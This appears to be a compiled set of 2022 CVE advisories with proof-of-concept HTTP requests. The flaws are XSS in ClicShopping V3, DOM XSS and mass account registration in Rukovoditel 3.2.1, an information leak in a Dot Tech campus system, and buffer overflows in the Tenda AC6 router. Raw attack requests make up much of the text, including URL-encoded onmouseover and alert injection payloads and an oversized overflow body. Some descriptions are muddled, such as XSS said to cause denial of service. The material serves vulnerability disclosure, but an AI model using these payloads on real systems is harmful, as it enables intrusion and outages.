A cross-site scripting (XSS) vulnerability in ClicShopping_V3 v3.402 allows attackers to execute arbitrary web scripts or HTML via a crafted URL parameter.

The name of an arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick users to open a very dangerous link or he can get sensitive information, also he can destroy some components of your system.

GET /ClicShopping\_V3\-version3\_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(\`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole\`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j\=1 HTTP/1.1
Host: pwnedhost.com
Accept\-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Language: en\-US;q\=0.9,en;q\=0.8
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Connection: close
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Sec\-CH\-UA: ".Not/A)Brand";v\="99", "Google Chrome";v\="107", "Chromium";v\="107"
Sec\-CH\-UA\-Platform: Windows
Sec\-CH\-UA\-Mobile: ?0

CVE-2022-45769: CVE-nu11secur1ty/vendors/clicshopping.org/2022/ClicShopping_V3 at main · nu11secur1ty/CVE-nu11secur1ty

Rukovoditel v3.2.1 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability in the component /rukovoditel/index.php?module=users/login. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request.

**Vendor**

**Description:**

The application is vulnerable to DOM-based cross-site scripting attacks. Data is read from location.hash and passed to jQuery.parseHTML. The registration function is not sanitizing well the hash gy651j5d1skektlts3g10ddvz6scjtas6mwi09hz6 from <a style="float: right" class="btn btn-info btn-registration" href="http://pwnedhost.com/rukovoditel/index.php?module=users/registration">gy651j5d1skektlts3g10ddvz6scjtas6mwi09hz6</a> was submited in GET request. The attacker can use this vulnerability to create an unlimited number of accounts on this system until it crashed.

**STATUS: HIGH Vulnerability - CRITICAL**

\[+\] Request:

    GET /rukovoditel/index.php?module=users/login HTTP/1.1
    Host: pwnedhost.com
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: cookie_test=please_accept_for_session; sid=2di7vn24tfnntmif91itsspf79
    Connection: close
    

\[+\] Response location.hash:

    <form action="http://pwnedhost.com/rukovoditel/index.php?module=users/login&action=login"  name="login_form" id="login_form" method="post" class="login-form"> <input  name="form_session_token" id="form_session_token" value="ChctFpqE22" type="hidden">
        <div class="form-group">
            
            <label class="control-label visible-ie8 visible-ie9">Username</label>
            <div class="input-icon">
                <i class="fa fa-user"></i>
                <input class="form-control placeholder-no-fix required" type="text" autocomplete="off" placeholder="Username" name="username"/>
            </div>
        </div>
        <div class="form-group">
            <label class="control-label visible-ie8 visible-ie9">Password</label>
            <div class="input-icon">
                <i class="fa fa-lock"></i>
                <input class="form-control placeholder-no-fix required"  type="password" autocomplete="off" placeholder="Password" name="password"/>
            </div>
        </div>
    
            
        <div class="form-actions">
                        <label class="checkbox"> <input  name="remember_me" id="remember_me" value="1" type="checkbox"> Remember Me</label>
            
            <button type="submit" class="btn btn-info pull-right">Login</button>
        </div>
    
        </form>
    
        <div class="forget-password">	
            <a style="float: right" class="btn btn-info btn-registration" href="http://pwnedhost.com/rukovoditel/index.php?module=users/registration">xovnabtd3t6fmsfirnuwpe0gn4ga7rxusvipagr6g</a>        <p><a href="http://pwnedhost.com/rukovoditel/index.php?module=users/restore_password">Password forgotten?</a></p>
        </div>
    

\[+\] Payload:

    GET /rukovoditel/index.php?module=dashboard/check_project_version&12958%22%3balert(Hello_from_nu11secur1ty)%2f%2f807=1 HTTP/1.1
    Host: pwnedhost.com
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: sid=me62gha57kek97j4m651jtuan8; cookie_test=please_accept_for_session; app_login_redirect_to=module%3Ddashboard%2F; app_remember_me=1; app_stay_logged=1; app_remember_user=YWRtaW4%3D; app_remember_pass=JFAkRUo2eU9wSWYuU095MWIyV0hQQWg2SjdoSS90ejhLMQ%3D%3D
    X-Requested-With: XMLHttpRequest
    Referer: http://pwnedhost.com/rukovoditel/index.php?module=dashboard/
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    
    

\[+\]Exploit:

    POST /rukovoditel/index.php?module=users/registration&action=save HTTP/1.1
    Host: pwnedhost.com
    Content-Length: 971
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://pwnedhost.com
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPtmHRBVsASEoZQx1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/registration
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: cookie_test=please_accept_for_session; sid=rcktjdlje3102291rfbvs19otn
    Connection: close
    
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="form_session_token"
    
    FXvkuHKIrc
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[6]"
    
    4
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[12]"
    
    k1
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="password"
    
    password
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[7]"
    
    k1
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[8]"
    
    k1nov
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[9]"
    
    k1@k.com
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[13]"
    
    english.php
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="user_agreement"
    
    1
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1--
    

**Reproduce:**

href

**Proof and Exploit:**

href

**Time spent**

3:45

CVE-2022-45020: CVE-nu11secur1ty/vendors/rukovoditel.net/2022/rukovoditel-3.2.1 at main · nu11secur1ty/CVE-nu11secur1ty

A vulnerability, which was classified as problematic, has been found in Dot Tech Smart Campus System. Affected by this issue is some unknown functionality of the file /services/Card/findUser. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-214778 is the identifier assigned to this vulnerability.

Information leakage vulnerability exists in findUser, a smart campus system developed by Dot Tech

    GET /services/Card/findUser HTTP/1.1
    Host: TARGET:PORT
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=CF54BC1161620D928C2D258B97DEE39B
    Connection: close

CVE-2022-4280: Vulnerability/Information leakage vulnerability exists in findUser, a smart campus system developed by Dot Tech.md at main · Peanut886/Vulnerability

Tenda AC6V1.0 V15.03.05.19 is vulnerable to Buffer Overflow via formSetMacFilterCfg.

Tenda Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the httpd module when handling /goform/formSetMacFilterCfg request.

This vulnerability lies in the /goform/formSetMacFilterCfg page，The details are shown below:

This POC can result in a Dos.

    POST /goform/setMacFilterCfg HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 182
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.204.133
    Referer: http://192.168.204.133/mac_filter.html?random=0.4768296248219275&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=eeg1qw
    Connection: close
    
    macFilterType=black&deviceList=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\r11

CVE-2022-45641: CVE-vulns/formSetMacFilterCfg.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the deviceId parameter in the addWifiMacFilter function.

CVE-2022-45643: CVE-vulns/addWifiMacFilter_deviceId.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the deviceId parameter in the formSetClientState function.

CVE-2022-45644: CVE-vulns/formSetClientState_deviceId.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the deviceMac parameter in the addWifiMacFilter function.

CVE-2022-45645: CVE-vulns/addWifiMacFilter_derviceMac.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the limitSpeedUp parameter in the formSetClientState function.

CVE-2022-45646: CVE-vulns/formSetClientState_limitSpeed.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the limitSpeed parameter in the formSetClientState function.

CVE-2022-45647: CVE-vulns/formSetClientState_limitSpeed.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the devName parameter in the formSetDeviceName function.

Tag

#webkit